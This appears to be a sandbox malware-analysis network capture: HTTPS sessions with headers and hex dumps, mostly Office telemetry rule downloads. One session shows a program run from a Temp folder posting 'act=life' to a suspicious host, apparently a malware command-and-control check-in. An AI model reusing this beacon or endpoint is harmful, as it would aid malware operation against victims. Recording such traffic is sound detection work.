                                                                                                                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                            2024-11-21 11:10:32 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                            Date: Thu, 21 Nov 2024 11:10:32 GMT
                                                                                                                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                                                                                                                            Content-Length: 468
                                                                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:41 GMT
                                                                                                                                                                                                                                                                                                            ETag: "0x8DC582BBA642BF4"
                                                                                                                                                                                                                                                                                                            x-ms-request-id: 1e58b78d-401e-0029-678d-3b9b43000000
                                                                                                                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                            x-azure-ref: 20241121T111032Z-1777c6cb7549j9hhhC1TEBzmcc0000000atg00000000k0bh
                                                                                                                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                            2024-11-21 11:10:32 UTC468INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120678" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120677" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                            76192.168.2.44981613.107.246.45443
                                                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                            2024-11-21 11:10:31 UTC192OUTGET /rules/rule120677v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                            2024-11-21 11:10:32 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                            Date: Thu, 21 Nov 2024 11:10:32 GMT
                                                                                                                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                                                                                                                            Content-Length: 405
                                                                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:25:37 GMT
                                                                                                                                                                                                                                                                                                            ETag: "0x8DC582B942B6AFF"
                                                                                                                                                                                                                                                                                                            x-ms-request-id: 964846c7-701e-001e-36c3-3bf5e6000000
                                                                                                                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                            x-azure-ref: 20241121T111032Z-1777c6cb754whff4hC1TEBcd6c00000009k000000000dwsa
                                                                                                                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                            2024-11-21 11:10:32 UTC405INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5e 5b 58 78 5d 5b 45 65 5d 5b 4e 6e 5d 24 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20 20 3c
                                                                                                                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120677" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120675" /> <SR T="2" R="(^[Xx][Ee][Nn]$)"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true"> <


                                                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                            77192.168.2.44981813.107.246.45443
                                                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                            2024-11-21 11:10:31 UTC192OUTGET /rules/rule120679v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                            2024-11-21 11:10:32 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                            Date: Thu, 21 Nov 2024 11:10:32 GMT
                                                                                                                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                                                                                                                            Content-Length: 174
                                                                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:25:33 GMT
                                                                                                                                                                                                                                                                                                            ETag: "0x8DC582B91D80E15"
                                                                                                                                                                                                                                                                                                            x-ms-request-id: 0c594107-601e-0032-67a5-3beebb000000
                                                                                                                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                            x-azure-ref: 20241121T111032Z-r1d97b99577l6wbzhC1TEB3fwn0000000ag0000000000a00
                                                                                                                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                            2024-11-21 11:10:32 UTC174INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 37 22 20 2f 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 54 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 31 22 20 2f 3e 0d 0a 20 20 3c 2f 54 3e 0d 0a 3c 2f 52 3e
                                                                                                                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120679" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120677" /> </S> <T> <S T="1" /> </T></R>


                                                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                            78192.168.2.449820188.114.96.34437968C:\Users\user\AppData\Local\Temp\1007914001\7b9f3f6834.exe
                                                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                            2024-11-21 11:10:32 UTC260OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                            Content-Length: 8
                                                                                                                                                                                                                                                                                                            Host: cook-rain.sbs
                                                                                                                                                                                                                                                                                                            2024-11-21 11:10:32 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                                                                                                                                                                                                                                                            Data Ascii: act=life
                                                                                                                                                                                                                                                                                                            2024-11-21 11:10:32 UTC982INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                            Date: Thu, 21 Nov 2024 11:10:32 GMT
                                                                                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                                                                            Set-Cookie: PHPSESSID=53jt1v6ovsupedk9oc1ln7g6bv; expires=Mon, 17-Mar-2025 04:57:11 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                                                                                                                                                            CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=UvnkLJb8i0nFdS7EEYIoNe%2BnFKIE6f6tpTcpQekSnBGIDhcKe80jQmJro%2FJrwNg7qyOs5atHXvU0VK51IPaN4lOYOa6tm8CIUhpAhcXCKe%2BQLCfTn%2BxcS0aOetxN3ZmC"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                                                                            CF-RAY: 8e603bdd6f2318ea-EWR
                                                                                                                                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1501&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2828&recv_bytes=904&delivery_rate=1932495&cwnd=242&unsent_bytes=0&cid=79dea88bed6a5151&ts=715&x=0"
                                                                                                                                                                                                                                                                                                            2024-11-21 11:10:32 UTC7INData Raw: 32 0d 0a 6f 6b 0d 0a
                                                                                                                                                                                                                                                                                                            Data Ascii: 2ok
                                                                                                                                                                                                                                                                                                            2024-11-21 11:10:32 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                            Data Ascii: 0


                                                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                            79192.168.2.44982213.107.246.45443
                                                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                            2024-11-21 11:10:33 UTC192OUTGET /rules/rule120681v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                            2024-11-21 11:10:34 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                            Date: Thu, 21 Nov 2024 11:10:34 GMT
                                                                                                                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                                                                                                                            Content-Length: 958
                                                                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:25:58 GMT
                                                                                                                                                                                                                                                                                                            ETag: "0x8DC582BA0A31B3B"
                                                                                                                                                                                                                                                                                                            x-ms-request-id: 47e3bf54-c01e-0082-038c-3aaf72000000
                                                                                                                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                            x-azure-ref: 20241121T111034Z-1777c6cb754xlpjshC1TEBv8cc0000000b50000000007537
                                                                                                                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                            2024-11-21 11:10:34 UTC958INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 38 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 30 38 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 32 22 20 52 3d 22 31 32 30 36 38 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 33 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 41 4e 44 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a
                                                                                                                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120681" V="0" DC="SM" T="Subrule" DCa="PSU" xmlns=""> <S> <R T="1" R="120608" /> <R T="2" R="120680" /> <TH T="3"> <O T="AND"> <L> <O T="EQ"> <L>


                                                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                            80192.168.2.44982113.107.246.45443
                                                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                            2024-11-21 11:10:33 UTC192OUTGET /rules/rule120680v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                            2024-11-21 11:10:34 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                            Date: Thu, 21 Nov 2024 11:10:34 GMT
                                                                                                                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                                                                                                                            Content-Length: 1952
                                                                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:25:39 GMT
                                                                                                                                                                                                                                                                                                            ETag: "0x8DC582B956B0F3D"
                                                                                                                                                                                                                                                                                                            x-ms-request-id: 6b04d5e8-e01e-000c-65ad-3b8e36000000
                                                                                                                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                            x-azure-ref: 20241121T111034Z-1777c6cb754gc8g6hC1TEB966c0000000b20000000003fpn
                                                                                                                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                            2024-11-21 11:10:34 UTC1952INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 38 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 53 53 20 54 3d 22 31 22 20 47 3d 22 7b 62 31 36 37 36 61 63 33 2d 37 66 65 65 2d 34 34 61 39 2d 39 61 30 65 2d 64 62 62 30 62 34 39 36 65 66 61 35 7d 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 32 22 20 52 3d 22 31 32 30 36 38 32 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 33 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 4c 54 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20
                                                                                                                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120680" V="0" DC="SM" T="Subrule" DCa="PSU" xmlns=""> <S> <SS T="1" G="{b1676ac3-7fee-44a9-9a0e-dbb0b496efa5}" /> <R T="2" R="120682" /> <F T="3"> <O T="LT"> <L>


                                                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                            81192.168.2.44982313.107.246.45443
                                                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                            2024-11-21 11:10:33 UTC192OUTGET /rules/rule120682v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                            2024-11-21 11:10:34 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                            Date: Thu, 21 Nov 2024 11:10:34 GMT
                                                                                                                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                                                                                                                            Content-Length: 501
                                                                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:18 GMT
                                                                                                                                                                                                                                                                                                            ETag: "0x8DC582BACFDAACD"
                                                                                                                                                                                                                                                                                                            x-ms-request-id: e6bcc5b6-c01e-0046-7064-3b2db9000000
                                                                                                                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                            x-azure-ref: 20241121T111034Z-178bfbc474bwlrhlhC1NYCy3kg00000001cg000000007y4y
                                                                                                                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                            2024-11-21 11:10:34 UTC501INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 38 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 41 20 54 3d 22 31 22 20 45 3d 22 54 65 6c 65 6d 65 74 72 79 53 74 61 72 74 75 70 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 32 22 20 52 3d 22 31 32 30 31 30 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 53 20 54 3d 22 33 22 20 47 3d 22 7b 62 31 36 37 36 61 63 33 2d 37 66 65 65 2d 34 34 61 39 2d 39 61 30 65 2d 64 62 62 30 62 34 39 36 65 66 61 35 7d 22 20 2f 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22
                                                                                                                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120682" V="0" DC="SM" T="Subrule" DCa="PSU" xmlns=""> <S> <A T="1" E="TelemetryStartup" /> <R T="2" R="120100" /> <SS T="3" G="{b1676ac3-7fee-44a9-9a0e-dbb0b496efa5}" /> </S> <C T="


                                                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                            82192.168.2.44982413.107.246.45443
                                                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                            2024-11-21 11:10:34 UTC193OUTGET /rules/rule120602v10s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                            2024-11-21 11:10:34 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                            Date: Thu, 21 Nov 2024 11:10:34 GMT
                                                                                                                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                                                                                                                            Content-Length: 2592
                                                                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:33 GMT
                                                                                                                                                                                                                                                                                                            ETag: "0x8DC582BB5B890DB"
                                                                                                                                                                                                                                                                                                            x-ms-request-id: 85babd8c-f01e-003f-4e8c-3ad19d000000
                                                                                                                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                            x-azure-ref: 20241121T111034Z-1777c6cb754vxwc9hC1TEBykgw0000000b30000000001673
                                                                                                                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                            2024-11-21 11:10:34 UTC2592INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 32 22 20 56 3d 22 31 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 53 79 73 74 65 6d 48 65 61 6c 74 68 4d 65 74 61 64 61 74 61 41 70 70 6c 69 63 61 74 69 6f 6e 41 6e 64 4c 61 6e 67 75 61 67 65 22 20 41 54 54 3d 22 63 64 38 33 36 36 32 36 36 31 31 63 34 63 61 61 61 38 66 63 35 62 32 65 37 32 38 65 65 38 31 64 2d 33 62 36 64 36 63 34 35 2d 36 33 37 37 2d 34 62 66 35 2d 39 37 39 32 2d 64 62 66 38 65 31 38 38 31 30 38 38 2d 37 35 32 31 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 44 43 61 3d
                                                                                                                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120602" V="10" DC="SM" EN="Office.System.SystemHealthMetadataApplicationAndLanguage" ATT="cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521" SP="CriticalBusinessImpact" DL="A" DCa=


                                                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                            83192.168.2.44982513.107.246.45443
                                                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                            2024-11-21 11:10:34 UTC192OUTGET /rules/rule120601v3s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                            2024-11-21 11:10:34 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                            Date: Thu, 21 Nov 2024 11:10:34 GMT
                                                                                                                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                                                                                                                            Content-Length: 3342
                                                                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:25:34 GMT
                                                                                                                                                                                                                                                                                                            ETag: "0x8DC582B927E47E9"
                                                                                                                                                                                                                                                                                                            x-ms-request-id: f77b0594-001e-0014-3c66-3b5151000000
                                                                                                                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                            x-azure-ref: 20241121T111034Z-178bfbc474bfw4gbhC1NYCunf400000001dg0000000068ga
                                                                                                                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                            2024-11-21 11:10:34 UTC3342INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 31 22 20 56 3d 22 33 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 53 79 73 74 65 6d 48 65 61 6c 74 68 4d 65 74 61 64 61 74 61 4f 53 22 20 41 54 54 3d 22 63 64 38 33 36 36 32 36 36 31 31 63 34 63 61 61 61 38 66 63 35 62 32 65 37 32 38 65 65 38 31 64 2d 33 62 36 64 36 63 34 35 2d 36 33 37 37 2d 34 62 66 35 2d 39 37 39 32 2d 64 62 66 38 65 31 38 38 31 30 38 38 2d 37 35 32 31 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 44 43 61 3d 22 44 43 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49
                                                                                                                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120601" V="3" DC="SM" EN="Office.System.SystemHealthMetadataOS" ATT="cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521" SP="CriticalBusinessImpact" DL="A" DCa="DC" xmlns=""> <RI


                                                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
